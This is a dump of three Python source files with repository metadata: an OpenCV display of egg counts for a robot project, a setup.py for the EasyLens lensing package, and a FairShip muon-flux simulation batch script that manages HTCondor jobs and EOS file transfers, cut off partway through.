] | |
b5dd0646b1b2c4b271da16df28f9fa635ae98a8c | 6162b166a93c60677b97b91c1f07be1511fd05e2 | /catkin_ws/src/jackal_hunt_rabbit/scripts/output.py | ae97f3dd5df85b938f61ff6c608095446704d1bb | [] | no_license | SiChiTong/fuzzy-eureka | d7c540e4349621097ee861e7337488ba46a2c718 | 61e2075cfd99520e0fb689e47aa73b3d43481f18 | refs/heads/master | 2021-08-24T09:04:28.384368 | 2017-12-08T23:30:23 | 2017-12-08T23:30:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 912 | py | #!/usr/bin/env python
import cv2
import numpy as np
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.namedWindow("ouput", flags = cv2.WINDOW_NORMAL)
img = np.zeros((512, 2400, 3), np.uint8)
def draw_egg(color, count, x, y):
cv2.ellipse(img, (x, y), (140, 200), 0, 0, 360, color, -1)
cv2.putText(img, count, (x - 80, y + 100), font, 8, (255, 255, 255), 12)
def show_output(eggs):
draw_egg((255, 0, 255), str(eggs[0]), 200, 250) # Magenta
draw_egg((0, 165, 255), str(eggs[1]), 600, 250) # Orange
draw_egg((0, 215, 255), str(eggs[2]), 1000, 250) # Yellow
draw_egg((0, 255, 0), str(eggs[3]), 1400, 250) # Green
draw_egg((255, 80, 0), str(eggs[4]), 1800, 250) # Blue
draw_egg((220, 40, 140), str(eggs[5]), 2200, 250) # Purple
cv2.imshow('ouput', img)
cv2.resizeWindow('ouput', 2400, 512)
cv2.moveWindow('ouput', 1125, 250)
key = cv2.waitKey(0)
cv2.destroyAllWindows()
| [
"[email protected]"
] | |
a149725c1bd9437f884bb652f73407173011b1b8 | 8e3a27091d51c3fd9681f5caf0534a0d3a36c3ff | /setup.py | d6e064fc1b06aca13b6baa6cd70dd4d6360354cb | [
"MIT"
] | permissive | DES-SL/EasyLens | c5c5d9dc5af7d6495027f7cfe51cdf48c0a098de | 97673d65abc00b945e7c6332e465c1d08fcb09a9 | refs/heads/master | 2020-04-06T07:09:07.342981 | 2016-11-08T10:47:20 | 2016-11-08T10:47:20 | 58,768,462 | 1 | 0 | null | 2016-05-20T06:19:18 | 2016-05-13T19:51:37 | Jupyter Notebook | UTF-8 | Python | false | false | 2,058 | py | #!/usr/bin/env python
import os
import sys
from setuptools.command.test import test as TestCommand
from setuptools import find_packages
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.test_args)
sys.exit(errno)
readme = open('README.rst').read()
doclink = """
Documentation
-------------
The full documentation can be generated with Sphinx"""
history = open('HISTORY.rst').read().replace('.. :changelog:', '')
requires = [] #during runtime
tests_require=['pytest>=2.3'] #for testing
PACKAGE_PATH = os.path.abspath(os.path.join(__file__, os.pardir))
setup(
name='easylens',
version='0.1.0',
description='Software package for modeling strong lens systems in the Dark Energy Survey data.',
long_description=readme + '\n\n' + doclink + '\n\n' + history,
author='Simon Birrer',
author_email='[email protected]',
url='https://github.com/DES-SL/EasyLens',
packages=find_packages(PACKAGE_PATH, "test"),
package_dir={'EasyLens': 'EasyLens'},
include_package_data=True,
install_requires=requires,
license='Proprietary',
zip_safe=False,
keywords='EasyLens',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
"Intended Audience :: Science/Research",
'Intended Audience :: Developers',
'License :: MIT License',
'Natural Language :: English',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
],
tests_require=tests_require,
cmdclass = {'test': PyTest},
)
| [
"[email protected]"
] | |
2a07ec5c9d77cdcc63263b3d1d6bc88a852f922f | 1a7595a5896ca709eb98805b2a570bf12775a9ff | /charmdet/runSimulation.py | fc5ba183cbf7a706b2c96ac695c39211242b342e | [] | no_license | nathandpenha/CERN-FairShip | 953683117f4971b323392bc1213b7ae7d9a3a708 | 10db3d519a5ac8fd67132afd39736b550cb60a30 | refs/heads/master | 2021-05-24T10:10:11.763338 | 2020-05-06T18:46:14 | 2020-05-06T18:46:14 | 261,848,065 | 2 | 0 | null | 2020-05-06T18:47:30 | 2020-05-06T18:39:22 | C++ | UTF-8 | Python | false | false | 42,585 | py | import os,subprocess,ROOT,time,multiprocessing,socket
ncpus = multiprocessing.cpu_count() - 2
interactive = not socket.gethostname().find('ubuntu')<0
pathToMacro = '' # $SHIPBUILD/FairShip/charmdet/
commandToHist = {"anaResiduals":"histos-analysis-","momResolution":"histos-momentumResolution-","plotDTPoints":"histos-DTPoints-",
"hitmaps":"histos-HitmapsFromFittedTracks-","alignment":"histos-residuals-","MCJpsiProd":"histos-Jpsi"}
commandToSum = {"anaResiduals":"momDistributions-","momResolution":"momentumResolution-","plotDTPoints":"DTPoints-","alignment":"residuals-",
"hitmaps":"HitmapsFromFittedTracks-","MCJpsiProd":"JpsiKinematics"}
def count_python_processes(macroName):
# only works if screen is wide enough to print full name!
status = subprocess.check_output('ps -f -u truf',shell=True)
n=0
for x in status.split('\n'):
if not x.find(macroName)<0 and not x.find('python') <0: n+=1
return n
fileList = {}
badFiles = []
eospath='/eos/experiment/ship/data/Mbias/background-prod-2018/'
def JpsiProdP8(run):
for n in range(run,run+15):
os.system("python $FAIRSHIP/macro/JpsiProdWithPythia8.py -n 100000000 -r "+str(n)+" &")
def mergeJpsiProdP8():
cmd = 'hadd Jpsi-Pythia8_XXXX_0-74.root'
N=0
for n in range(75):
fname = "Jpsi-Pythia8_100000000_"+str(n)+".root"
if not os.path.isfile(fname): continue
f = ROOT.TFile(fname)
if not f: continue
if not f.Get('pythia6'): continue
N+=100000000
cmd += " "+fname
cmd=cmd.replace('XXXX',str(N))
os.system(cmd)
def JpsiProdP8_withHTCondor(run=10000,njobs=1000,NPot=1000000,merge=False):
# microcentury = 1h ok with 1000000 NPot, 45min
# workday = 8h whould be ok with 5000000
eosLocation = os.environ['EOSSHIP']+"/eos/experiment/ship/user/truf/muflux-sim/JpsiProduction_P8/"
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l /eos/experiment/ship/user/truf/muflux-sim/JpsiProduction_P8",shell=True)
cmd = "hadd Jpsi-Pythia8_XXXX_"+str(run)+"-"+str(run+njobs)+".root"
Ntot = 0
for n in range(run,run+njobs):
output = "Jpsi-Pythia8_"+str(NPot)+"_"+str(n)+".root"
if not merge:
# create condor sub
fc = open('condorJ.sub','w')
fc.write('executable = JpsiProd.sh\n')
fc.write('arguments = '+str(NPot)+' '+str(n)+' '+output+' '+eosLocation+output +' \n')
fc.write('should_transfer_files = YES\n')
fc.write('when_to_transfer_output = ON_EXIT\n')
x = 'run_'+str(n)
fc.write('output = output/'+x+'.out\n')
fc.write('error = error/'+x+'.err\n')
fc.write('log = log/'+x+'.log\n')
fc.write('+JobFlavour = "workday"\n') #"microcentury" workday
fc.write('queue\n')
fc.close()
os.system('condor_submit condorJ.sub')
else:
eosfile = (eosLocation+output)
if output in temp:
f=ROOT.TFile.Open(eosfile)
if f.Get('pythia6'):
cmd += " "+eosfile
Ntot+=NPot
if merge:
cmd = cmd.replace('XXXX',str(Ntot))
tmp = cmd.split(' ')
outfile = tmp[1]
cmd = 'hadd -f '+outfile
N=0
for n in range(2,len(tmp)):
N+=1
cmd += ' ' + tmp[n]
if N>500:
os.system(cmd)
os.system('cp '+outfile+' tmp.root')
cmd = "hadd -f "+outfile+' tmp.root '
N=0
os.system(cmd)
def run_FixedTarget(start):
N = 10000
for n in range(start,start+ncpus):
cmd = "python $FAIRSHIP/muonShieldOptimization/run_MufluxfixedTarget.py -n "+str(N)+" -e 1 -P -o run-"+str(n)+" &"
os.system(cmd)
while 1>0:
if count_python_processes('run_MufluxfixedTarget')<ncpus: break
time.sleep(100)
print "finished all the tasks."
def mergeFiles():
N = 0
cmd = 'hadd -f pythia8_Geant4_1000_1.0-XXX.root '
for d in os.listdir('.'):
if d.find('run')<0:continue
if os.path.isdir(d):
fname = d+'/pythia8_Geant4_1000_1.0.root'
if not os.path.isfile(fname): continue
f = ROOT.TFile(fname)
if f.Get('cbmsim'):
cmd += fname+' '
N+=1
os.system(cmd.replace('XXX',str(N)))
def submit2Condor(eospath,directory,filename):
sub = filename.replace('root','sub')
f = open(sub,'w')
f.write("executable = /afs/cern.ch/user/t/trufship/muflux/runDriftTubeScript.sh\n")
f.write("arguments = "+command+" "+eospath+directory+"/"+filename+"\n")
f.write("output = "+filename.replace('root','out')+"\n")
f.write("error = "+filename.replace('root','error')+"\n")
f.write("log = "+filename.replace('root','log')+"\n")
f.write("queue\n")
f.close()
os.system("condor_submit "+sub)
def getFilesFromEOS(E="10.0_withCharmandBeauty"): # E="1.0"
# list of files
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospath,shell=True)
for x in temp.split('\n'):
if x.find(E)<0 or x.find('_mu')<0: continue # includes charm
fname = x[x.find('/eos'):]
nentries = 0
f=ROOT.TFile.Open(os.environ['EOSSHIP']+fname)
nentries=f.cbmsim.GetEntries()
fileList[fname]=nentries
return fileList
def getFilesLocal(d='.'):
# list of files
fl = []
temp = os.listdir(d)
for x in temp:
if os.path.isdir(d+'/'+x): fl.append(x)
return fl
def getFilesEOS(D):
eospathSim = '/eos/experiment/ship/user/truf/muflux-sim/'+D
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospathSim,shell=True)
fl = []
for x in temp.split('\n'):
if x.find('pythia8_Geant4')<0: continue
d = x[x.rfind('/')+1:]
fl.append(eospathSim+'/'+d)
return fl
def simulationStep(fnames=[],E="10.0_withCharmandBeauty",overwrite=False):
if len(fnames)==0: fnames = getFilesFromEOS(E)
Nfiles = len(fnames)
print "fileList established ",Nfiles
for fname in fnames:
N = fnames[fname]-1
odir = fname[fname.rfind('/')+1:].replace('.root','')
if not overwrite and odir in os.listdir('.'): continue
cmd = "python $FAIRSHIP/macro/run_simScript.py -n "+str(N)+" --MuonBack --charm=1 --CharmdetSetup=0 --output "+odir+" -f "+fname+" &"
print 'step 1:', cmd
os.system(cmd)
while 1>0:
if count_python_processes('run_simScript')<ncpus: break
time.sleep(100)
print "finished all the tasks."
def digiStep(fnames=[]):
if len(fnames)==0: fnames = getFilesLocal()
Nfiles = len(fnames)
print "fileList established ",Nfiles
for fname in fnames:
os.chdir(fname)
mcFile = 'ship.conical.MuonBack-TGeant4.root'
geoFile = 'geofile_full.conical.MuonBack-TGeant4.root'
cmd = "python $FAIRSHIP/macro/runMufluxDigi.py -n 9999999 -f "+mcFile+" -g "+geoFile+" &"
print 'step 2:', cmd
os.system(cmd)
os.chdir('../')
while 1>0:
if count_python_processes('runMufluxDigi')<ncpus: break
time.sleep(100)
print "finished all the tasks."
def findDirWithSim():
fnames = getFilesLocal()
stats = {'simOnly':[],'tmp':[],'failed':[],'digi':[],'digireco':{}}
for fname in fnames:
geo = False
digi = False
tmp = False
digiSplit = 0
reco = 0
for x in os.listdir(fname):
if not x.find('geofile_full.conical.MuonBack-TGeant4')<0: geo = True
if not x.find('roottmp')<0: tmp = True
if not x.find('dig.root')<0: digi = True
if not x.find('dig_RT')<0: reco+=1
if not x.find('dig-')<0: digiSplit+=1
if tmp: stats['tmp'].append(fname)
elif digi: stats['digi'].append(fname)
elif geo:
if reco==0 and digiSplit==0: stats['simOnly'].append(fname)
else : stats['failed'].append(fname)
stats['digireco'][fname]=[digiSplit,reco]
for x in stats['tmp']:
f = ROOT.TFile(x+'/ship.conical.MuonBack-TGeant4.roottmp')
try:
if f.cbmsim.GetEntries()>0:
print 'tmp file ok, replace root file',x
os.system('mv '+x+'/ship.conical.MuonBack-TGeant4.roottmp '+x+'/ship.conical.MuonBack-TGeant4.root')
except:
print 'tmp file not ok',x
return stats
def splitDigiFiles(splitFactor=5,fnames=[]):
if len(fnames)==0: fnames = getFilesLocal()
Nfiles = len(fnames)
print "fileList established ",Nfiles
for fname in fnames:
os.chdir(fname)
ofile = 'ship.conical.MuonBack-TGeant4_dig.root'
if not ofile in os.listdir('.'):
os.chdir('../')
continue
origin = ROOT.TFile(ofile)
if not origin.GetKey('cbmsim'):
print "corrupted file",fname
os.chdir('../')
continue
sTree = origin.cbmsim
N = 0
deltaN = int(sTree.GetEntries()/float(splitFactor))
for i in range(splitFactor):
nf = ofile.replace('.root','-'+str(i)+'.root')
if nf in os.listdir('.'):
print "file exists",fname,nf
else:
newFile = ROOT.TFile(nf,'RECREATE')
newTree = sTree.CloneTree(0)
for n in range(N,N+deltaN):
rc = sTree.GetEntry(n)
rc = newTree.Fill()
newFile.Write()
N+=deltaN
os.chdir('../')
def recoStep(splitFactor=5,fnames=[],eospath=False):
eospathSim = '/eos/experiment/ship/user/truf/muflux-sim/'
if len(fnames)==0: fnames = getFilesLocal()
Nfiles = len(fnames)
print "fileList established #directories",Nfiles
for fname in fnames:
os.chdir(fname)
mcFile = 'ship.conical.MuonBack-TGeant4_dig_RT.root'
ofile = 'ship.conical.MuonBack-TGeant4_dig.root'
for i in range(splitFactor):
recoFile = mcFile.replace('.root','-'+str(i)+'.root')
if recoFile in os.listdir('.'):
test = ROOT.TFile(recoFile)
sTree = test.Get('cbmsim')
if sTree:
if sTree.GetBranch("FitTracks"): continue
test.Close()
digiFile = ofile.replace('.root','-'+str(i)+'.root')
if digiFile in os.listdir('.'):
os.system('cp '+ofile.replace('.root','-'+str(i)+'.root')+' '+recoFile)
elif not recoFile in os.listdir('.'):
if eospath:
os.system('xrdcp $EOSSHIP'+eospathSim+'/'+eospath+'/'+fname+'/'+digiFile+ ' '+recoFile)
else:
print "digiFile missing",fname,digiFile
continue
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py -c recoStep1 -u 1 -f "+recoFile+' &'
print 'step 2:', cmd,' in directory ',fname
os.system(cmd)
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus: break
time.sleep(100)
os.chdir('../')
print "finished all the tasks."
def checkFilesWithTracks(D='.',splitFactor=5,dimuon=False):
eos = ''
if D=='.': fnames = getFilesLocal()
elif D.find('1GeV')==0 or D.find('10GeV')==0:
fnames = getFilesEOS(D)
eos = os.environ['EOSSHIP']
fileList=[]
fileListPer={}
failedList = []
for fname in fnames:
fileListPer[fname]={}
mcFile = 'ship.conical.MuonBack-TGeant4_dig_RT.root'
for i in range(splitFactor):
recoFile = fname+'/'+mcFile.replace('.root','-'+str(i)+'.root')
if dimuon: recoFile = recoFile.replace('.root','_dimuon99.root')
if D=='.': dirList = os.listdir(fname)
else: dirList = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls "+fname,shell=True)
if recoFile.replace(fname+'/','') in dirList:
test = ROOT.TFile.Open(eos+recoFile)
if not test: continue
sTree = test.Get('cbmsim')
if sTree:
if sTree.GetBranch("FitTracks"):
fileList.append(recoFile)
size = sTree.GetBranch('FitTracks').GetTotalSize()/float(sTree.GetEntries())
fileListPer[fname][recoFile.replace(D+'.'+fname+'/','')]=size
# print "check",fname,recoFile,size
else:
failedList.append(fname+'/'+recoFile)
fileList.sort()
return fileList,fileListPer,failedList
def cleanUp():
reco,x,y = checkFilesWithTracks()
for f in reco:
df = f.replace('_RT','')
if os.path.isfile(df): os.system('rm ' +df)
def makeHistos(D='.',splitFactor=5,command="anaResiduals",fnames=[]):
if D=='.':
fileList,x,y = checkFilesWithTracks(D,splitFactor)
print "fileList established ",len(fileList)
for df in fileList:
tmp = df.split('/')
if len(tmp)>1: os.chdir(tmp[0])
if not commandToHist[command]+tmp[1] in os.listdir('.'):
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py -c "+command+" -f "+tmp[1]+' &'
print 'execute:', cmd
os.system(cmd)
if len(tmp)>1: os.chdir('../')
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus: break
time.sleep(100)
elif D.find('1GeV')==0 or D.find('10GeV')==0:
eospathSim = '/eos/experiment/ship/user/truf/muflux-sim/'+D
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospathSim,shell=True)
for x in temp.split('\n'):
if x.find('pythia8_Geant4')<0: continue
d = x[x.rfind('/')+1:]
if not d in os.listdir('.'): os.system('mkdir '+d)
os.chdir(d)
temp2 = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospathSim+'/'+d,shell=True)
fileList = []
for y in temp2.split('\n'):
f = os.environ['EOSSHIP'] + y[y.find('/eos'):]
if not f[f.rfind('/')+1:].find('ship')==0: continue
if f.find('RT')<0: continue
histFile = commandToHist[command]+y[y.rfind('/')+1:]
if histFile in os.listdir('.') : continue
if interactive:
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py -c "+command+" -f "+f+' >'+histFile.replace('histo','log')+' &'
print 'execute:', cmd
os.system(cmd)
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus: break
time.sleep(100)
else: submit2Condor(eospathSim,d,y[y.rfind('/')+1:])
os.chdir('../')
else:
eospathSim10GeV = '/eos/experiment/ship/data/muflux/MC/19feb2019'
fileList = []
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospathSim10GeV,shell=True)
for x in temp.split('\n'):
if x.find('RT.root')<0: continue
fileList.append( os.environ['EOSSHIP'] + x[x.find('/eos'):])
for fname in fileList:
if os.path.isfile(commandToHist[command]+fname[fname.rfind('/')+1:]): continue
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py -c "+command+" -f "+fname+' &'
print 'command:', cmd
os.system(cmd)
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus: break
time.sleep(10)
print "finished all the tasks."
def makeHistosWithHTCondor(D='10GeV-repro',splitFactor=10,command="anaResiduals",fnames=[]):
eospathSim = '/eos/experiment/ship/user/truf/muflux-sim/'+D
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls "+eospathSim,shell=True)
for d in temp.split('\n'):
if d.find('pythia8_Geant4')<0: continue
temp2 = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls "+d,shell=True)
fileList = []
for fname in temp2.split('\n'):
if not fname[fname.rfind('/')+1:].find('ship')==0: continue
if fname.find('RT-')<0: continue
hfile = commandToHist[command]+fname[fname.rfind('/')+1:]
nfile = 'ntuple-'+fname[fname.rfind('/')+1:]
if command == "alignment": nfile = "histos-HitmapsFromFittedTracks-"+fname[fname.rfind('/')+1:]
if os.path.isfile(eospathSim+'/'+d+'/'+hfile): continue
# create condor sub
fc = open('condorX.sub','w')
fc.write('executable = batchScript.sh\n')
fc.write('arguments = '+fname+' '+command+' '+hfile+' '+os.environ['EOSSHIP']+eospathSim+'/'+d+'/'+hfile+' '+nfile+' '+os.environ['EOSSHIP']+eospathSim+'/'+d+'/'+nfile+' \n')
fc.write('should_transfer_files = YES\n')
fc.write('when_to_transfer_output = ON_EXIT\n')
x = fname[fname.rfind('/')+1:]
fc.write('output = output/'+x+'.out\n')
fc.write('error = error/'+x+'.err\n')
fc.write('log = log/'+x+'.log\n')
fc.write('+JobFlavour = "microcentury"\n')
fc.write('queue\n')
fc.close()
os.system('condor_submit condorX.sub')
time.sleep(0.1)
def HTCondorStats(D='10GeV-repro',command="anaResiduals",fnames=[]):
eospathSim = '/eos/experiment/ship/user/truf/muflux-sim/'+D
stats = {}
if len(fnames)==0:
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls "+eospathSim,shell=True)
fnames = temp.split('\n')
for x in fnames:
if x.find("pythia8")<0: continue
run = x[x.rfind('/')+1:]
eospathSimR = eospathSim+'/'+run
stats[run]={'recoFiles':[],'histoFiles':[]}
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls "+eospathSimR,shell=True)
for z in temp.split('\n'):
if z.find('.root')<0: continue
stats[run]['recoFiles'].append( os.environ['EOSSHIP'] + z[z.find('/eos'):])
# all RT files with tracks
temp2 = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls "+eospathSimR,shell=True)
for fname in stats[run]['recoFiles']:
if not fname.find('sys')<0: continue
hfile = commandToHist[command]+fname[fname.rfind('/')+1:]
if not temp2.find(hfile)<0:
stats[run]['histoFiles'].append(hfile)
total = [0,0]
for x in stats:
print x,len(stats[x]['recoFiles']),len(stats[x]['histoFiles']),'missing:',len(stats[x]['recoFiles'])-len(stats[x]['histoFiles'])
total[0]+=len(stats[x]['recoFiles'])
total[1]+=len(stats[x]['histoFiles'])
print "summary total reco",total[0],' histos',total[1],' missing',total[0]-total[1]
return stats
def makeMomResolutions(D='.',splitFactor=5):
if D=='.':
fileList,x,y = checkFilesWithTracks(D,splitFactor)
print "fileList established ",len(fileList)
for df in fileList:
tmp = df.split('/')
if len(tmp)>1: os.chdir(tmp[0])
if not "histos-momentumResolution-"+tmp[1] in os.listdir('.'):
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py -c momResolution -f "+tmp[1]+' &'
print 'execute:', cmd
os.system(cmd)
if len(tmp)>1: os.chdir('../')
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus: break
time.sleep(100)
elif D.find('1GeV')==0 or D.find('10GeV')==0:
eospathSim = '/eos/experiment/ship/user/truf/muflux-sim/'+D
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospathSim,shell=True)
for x in temp.split('\n'):
if x.find('pythia8_Geant4')<0: continue
d = x[x.rfind('/')+1:]
if not d in os.listdir('.'): os.system('mkdir '+d)
os.chdir(d)
temp2 = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospathSim+'/'+d,shell=True)
fileList = []
for y in temp2.split('\n'):
f = os.environ['EOSSHIP'] + y[y.find('/eos'):]
if not f.find('histos')<0: continue
if f.find('RT')<0: continue
histFile = 'histos-momentumResolution-'+y[y.rfind('/')+1:]
if histFile in os.listdir('.') : continue
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py --c momResolution -f "+f+' &'
print 'execute:', cmd
os.system(cmd)
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus: break
time.sleep(100)
os.chdir('../')
print "finished all the tasks."
def checkAlignment(D='.',splitFactor=5):
if D=='.':
fileList,x,y = checkFilesWithTracks(D,splitFactor)
print "fileList established ",len(fileList)
for df in fileList:
tmp = df.split('/')
if len(tmp)>1: os.chdir(tmp[0])
if not "histos-residuals-"+tmp[1] in os.listdir('.'):
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py -c alignment -f "+tmp[1]+' &'
print 'execute:', cmd
os.system(cmd)
if len(tmp)>1: os.chdir('../')
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus: break
time.sleep(100)
elif D.find('1GeV')==0 or D.find('10GeV')==0:
eospathSim = '/eos/experiment/ship/user/truf/muflux-sim/'+D
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospathSim,shell=True)
for x in temp.split('\n'):
if x.find('pythia8_Geant4')<0: continue
d = x[x.rfind('/')+1:]
if not d in os.listdir('.'): os.system('mkdir '+d)
os.chdir(d)
temp2 = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospathSim+'/'+d,shell=True)
fileList = []
for y in temp2.split('\n'):
f = os.environ['EOSSHIP'] + y[y.find('/eos'):]
test = f[f.rfind('/')+1:]
if not test.find('ship.')==0: continue
if f.find('RT')<0: continue
histFile = 'histos-residuals-'+y[y.rfind('/')+1:]
if histFile in os.listdir('.') : continue
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py -c alignment -f "+f+' &'
print 'execute:', cmd
os.system(cmd)
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus: break
time.sleep(100)
os.chdir('../')
print "finished all the tasks."
def exportToEos(fnames=[],destination="/eos/experiment/ship/user/truf/muflux-sim/1GeV",update=True,tag=None):
remote = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+destination,shell=True).split('\n')
fnames = getFilesLocal()
for D in fnames:
if not D in remote:
os.system("xrdfs "+os.environ['EOSSHIP']+" mkdir "+destination+"/"+D)
remoteD = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+destination+'/'+D,shell=True)
for f in os.listdir(D):
if tag:
if f.find(tag)<0:continue
if f in remoteD and not update: continue
fname = D+'/'+f
cmd = "xrdcp -f "+fname+" $EOSSHIP/"+destination+"/"+fname
print cmd
os.system(cmd)
def importFromEos(source="/eos/experiment/ship/user/truf/muflux-sim/1GeV",tag="ship.conical.MuonBack-TGeant4.root",update=True):
remote = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+source,shell=True).split('\n')
for x in remote:
if x.find('eos')<0:continue
fname = x.split(source)[1]
files = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+source+fname,shell=True).split('\n')
for y in files:
if y.find('eos')<0:continue
afile = '/eos'+y.split('/eos')[1]
if afile.find(tag)<0:continue
destination = afile.split(source)[1]
cmd = "xrdcp "
if update: cmd += " -f "
cmd += " $EOSSHIP/"+afile+" "+destination[1:]
print cmd
os.system(cmd)
def exportNtupleToEos(d="simulation10GeV-withDeadChannels",key='ntuple',update=True):
eospath = "/eos/experiment/ship/user/truf/muflux-sim/"
destination = eospath+d.replace('simulation','').split('-final')[0]
for D in os.listdir(d):
if os.path.isdir(d+'/'+D):
for f in os.listdir(d+'/'+D):
if f.find(key)==0:
cmd = "xrdcp "+d+'/'+D+'/'+f+ " $EOSSHIP/"+destination+"/"+D+'/'+f
if update : cmd = "xrdcp -f "+d+'/'+D+'/'+f+ " $EOSSHIP/"+destination+"/"+D+'/'+f
print cmd
os.system(cmd)
def mergeHistos(command="anaResiduals"):
dirList=getFilesLocal()
cmd = {}
for z in ['charm','mbias']:
cmd[z] = 'hadd -f '+commandToSum[command]+z+'.root '
for d in dirList:
for x in os.listdir(d):
z='mbias'
if d.find('charm')>0: z='charm'
if (not x.find(commandToHist[command])<0 ): cmd[z] += d+'/'+x+" "
for z in ['charm','mbias']:
os.system(cmd[z])
def mergeNtuple():
dirList=getFilesLocal()
cmd = {}
for z in ['charm','mbias']:
cmd[z] = 'hadd -f ntuple-'+z+'.root '
for d in dirList:
for x in os.listdir(d):
z='mbias'
if d.find('charm')>0: z='charm'
if (not x.find('ntuple')<0 ): cmd[z] += d+'/'+x+" "
for z in ['charm','mbias']:
os.system(cmd[z])
import rootUtils as ut
def checkHistos():
dirList=getFilesLocal()
Ntot = 0
shit = []
for d in dirList:
nfailed = 0
for x in os.listdir(d):
if not x.find('histos-analysis-')<0:
h={}
ut.readHists(h,d+'/'+x,['p/pt'])
N = h['p/pt'].GetEntries()
if N == 0: nfailed+=1
print d+'/'+x,N
Ntot+=N
print nfailed
if nfailed == 10: shit.append(d)
print Ntot
return shit
def checkForFilesWithTracks():
eospathSim10GeV = '/eos/experiment/ship/data/muflux/MC/19feb2019'
fileList = []
trList = []
temp = subprocess.check_output("xrdfs "+os.environ['EOSSHIP']+" ls -l "+eospathSim10GeV,shell=True)
for x in temp.split('\n'):
if x.find('RT.root')<0: continue
fname = os.environ['EOSSHIP'] + x[x.find('/eos'):]
fileList.append( fname )
test = ROOT.TFile.Open(fname)
if test.GetKey('cbmsim'):
if test.cbmsim.GetBranch('FitTracks'): trList.append(fname)
print len(fileList),len(trList)
def mergeHistos10(case='residuals'):
N = 1
n = 0
for x in os.listdir('.'):
if n==0:
if case == 'residuals': cmd = 'hadd -f residuals-'+str(N)+'.root '
elif case == 'momResolution': cmd = 'hadd -f momentumResolution-'+str(N)+'.root '
else: cmd = 'hadd -f momDistributions-'+str(N)+'.root '
if (case == 'residuals' and not x.find('histos-residuals')<0 ): cmd += x+" "
elif (case == 'momResolution' and not x.find('momentumResolution')<0 ): cmd += x+" "
elif (case == 'momDistribution' and not x.find('analysis')<0 ): cmd += x+" "
n+=1
if n==500:
os.system(cmd)
n=0
N+=1
if case == 'residuals': histname = 'residuals.root '
elif case == 'momResolution': histname = 'momentumResolution.root '
else: histname = 'momDistributions.root '
cmd = 'hadd -f '+histname
for n in range(1,N+1):
cmd += histname.replace('.','-'+str(N)+'.')
os.system(cmd)
def redoMuonTracks():
fileList,x,y = checkFilesWithTracks(D='.')
for df in fileList:
tmp = df.split('/')
if len(tmp)>1:
os.chdir(tmp[0])
cmd = "python $FAIRSHIP/charmdet/drifttubeMonitoring.py -c recoMuonTaggerTracks -u 1 -f "+tmp[1]+' &'
print 'execute:', cmd
os.system(cmd)
os.chdir('../')
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus: break
time.sleep(100)
print "finished all the tasks."
def splitOffBoostedEvents(splitFactor=5,check=False):
remote = "/home/truf/ship-ubuntu-1710-32/muflux/simulation/"
dirList=getFilesLocal(remote)
for d in dirList:
if not os.path.isdir(d): os.system('mkdir '+d)
os.chdir(d)
for f in os.listdir(remote+'/'+d):
if f.find('histo')<0 and not f.find('ship.conical')<0:
if not check:
os.system('cp '+remote+'/'+d+'/'+f+' .')
cmd = "python /home/truf/muflux/simulation/drifttubeMonitoring.py -c splitOffBoostedEvents -f "+f+' &'
print 'execute:', cmd
os.system(cmd)
while 1>0:
if count_python_processes('drifttubeMonitoring')<ncpus: break
time.sleep(100)
else:
# check
f99 = f.replace('.root','_dimuon99.root')
f1 = f.replace('.root','_dimuon1.root')
l = os.listdir('.')
if not f in l or not f99 in l or f1 in l:
print 'something wrong',d,f
print f,f in l
print f99,f99 in l
print f1,f1 in l
os.chdir('../')
def runMufluxReco(D='1GeV',merge=False):
N = 24
ncpus = 8
if merge:
cmd = "hadd sumHistos--simulation10GeV-repro.root "
